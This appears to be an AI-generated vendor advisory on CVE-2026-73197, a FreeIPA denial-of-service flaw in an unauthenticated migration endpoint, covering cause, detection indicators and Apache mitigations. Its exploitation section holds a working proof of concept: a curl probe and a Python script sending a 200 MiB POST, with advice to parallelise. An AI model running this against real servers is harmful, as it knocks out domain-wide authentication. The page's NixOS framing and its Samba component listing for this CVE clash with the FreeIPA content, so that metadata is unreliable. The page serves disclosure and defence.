CVE-2026-73197
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-73197 is a denial-of-service vulnerability in FreeIPA (Red Hat's ipa package) caused by unbounded request body reads in the /ipa/migration/migration.py WSGI endpoint. A remote, unauthenticated attacker can send oversized form POST requests to this endpoint, forcing the migration handler to read attacker-controlled data fully into memory, leading to memory exhaustion and service disruption. The vulnerability was reported by AISLE Research, filed in Bugzilla on 2026-05-11, and publicly disclosed on 2026-08-20. It carries a CVSS v3.1 base score of 7.5 (High) (Red Hat CVE, GitHub Advisory).

Technical details

The root cause is CWE-770 (Allocation of Resources Without Limits or Throttling). The vulnerable code in install/migration/migration.py reads the full request body based on the attacker-supplied CONTENT_LENGTH header without imposing any upper bound before the read: query_string = environ["wsgi.input"].read(length).decode("utf-8"). The Apache configuration shipped with FreeIPA exposes the /ipa/migration endpoint without authentication (Require all granted), meaning no credentials are needed to reach the vulnerable code path. An attacker only needs network access to the endpoint and the ability to send large application/x-www-form-urlencoded POST requests (Red Hat Bugzilla).

Impact

Successful exploitation causes increased memory consumption in Apache/WSGI worker processes, slower request handling, and potential worker recycling or full service disruption of the FreeIPA identity management service. Because FreeIPA provides centralized authentication and directory services, a sustained DoS attack could prevent users and systems from authenticating, impacting availability across the entire managed domain. There is no confidentiality or integrity impact — the vulnerability is strictly an availability issue (Red Hat CVE, Red Hat Bugzilla).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported as of the disclosure date. The EPSS score is 0.0, indicating very low current probability of exploitation in the wild, and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory). Exploitation is straightforward — it requires only network access and the ability to send large HTTP POST requests, with no authentication or special preconditions beyond the migration endpoint being enabled and reachable (Red Hat Bugzilla).

Exploitation steps

  1. Reconnaissance: Identify FreeIPA servers exposing the /ipa/migration/migration.py endpoint over HTTPS (typically port 443), using network scanning tools such as Nmap or Shodan targeting known FreeIPA deployments.
  2. Verify endpoint accessibility: Confirm the endpoint is reachable without authentication using a simple POST request:
curl -k -i https://<target>/ipa/migration/migration.py -X POST \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'username=a&password=b'
  1. Send oversized POST body: Craft and send a large application/x-www-form-urlencoded POST request to force memory allocation in the WSGI worker:
import requests
u = 'https://<target>/ipa/migration/migration.py'
d = 'username=a&password=' + 'A' * (200 * 1024 * 1024)  # 200 MiB body
print(requests.post(u, data=d, headers={'Content-Type': 'application/x-www-form-urlencoded'}, verify=False, timeout=120).status_code)
  1. Repeat or parallelize: Send multiple concurrent oversized requests from one or more clients to amplify memory pressure across multiple WSGI workers.
  2. Observe impact: Monitor for increased RSS on httpd/WSGI worker processes, slower response times, worker recycling, or full service unavailability of the FreeIPA web interface and authentication services (Red Hat Bugzilla).

Indicators of compromise

  • Network: Unusually large HTTP POST requests (hundreds of MiB) to /ipa/migration/migration.py from external or unexpected source IPs; high volume of concurrent POST requests to the migration endpoint.
  • Logs: Apache access logs (/var/log/httpd/access_log) showing repeated large POST requests to /ipa/migration/migration.py with very high Content-Length values; error log entries indicating WSGI worker restarts or memory-related failures.
  • Process: Elevated RSS/memory usage on httpd worker processes observable via top, ps, or system monitoring tools; unexpected worker process recycling or crashes associated with the mod_wsgi handler.
  • System: Increased swap usage or OOM killer events in /var/log/messages or dmesg output coinciding with requests to the migration endpoint (Red Hat Bugzilla).

Mitigation and workarounds

Red Hat recommends two immediate mitigations while a patched package is pending. First, if the /ipa/migration endpoint is not required, disable it by commenting out the Alias /ipa/migration directive and its corresponding <Location> block in /etc/httpd/conf.d/ipa.conf. Second, if the endpoint must remain active, add a LimitRequestBody directive within the migration endpoint's configuration block to cap request body size (e.g., LimitRequestBody 1048576 for 1 MiB). A proposed code-level fix adds a MAX_REQUEST_BODY = 1024 * 1024 constant and rejects requests exceeding this limit before reading from wsgi.input. After any Apache configuration change, reload or restart httpd to apply the changes. A tracker for a formal package fix has been filed for RHEL 10.3 (RHEL-188996) (Red Hat CVE, Red Hat Bugzilla).

Community reactions

The vulnerability was credited to AISLE Research by Red Hat. Social media coverage was limited to automated vulnerability tracking accounts, including a Mastodon post from @thehackerwire shortly after disclosure. No significant independent researcher commentary or broader media coverage has been identified as of the disclosure date (Red Hat CVE).

Additional resources


SourceThis report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-13097CRITICAL9.1
  • NixOS logoNixOS
  • python3-samba-test
NoYesAug 20, 2026
CVE-2026-11861HIGH8.1
  • NixOS logoNixOS
  • samba-common
NoYesAug 20, 2026
CVE-2026-73198HIGH7.5
  • NixOS logoNixOS
  • ctdb-ceph-mutex
NoYesAug 20, 2026
CVE-2026-73197HIGH7.5
  • NixOS logoNixOS
  • samba-test-libs-debuginfo
NoYesAug 20, 2026
CVE-2026-73196MEDIUM6.5
  • NixOS logoNixOS
  • samba-ldb-ldap-modules-debuginfo
NoYesAug 20, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management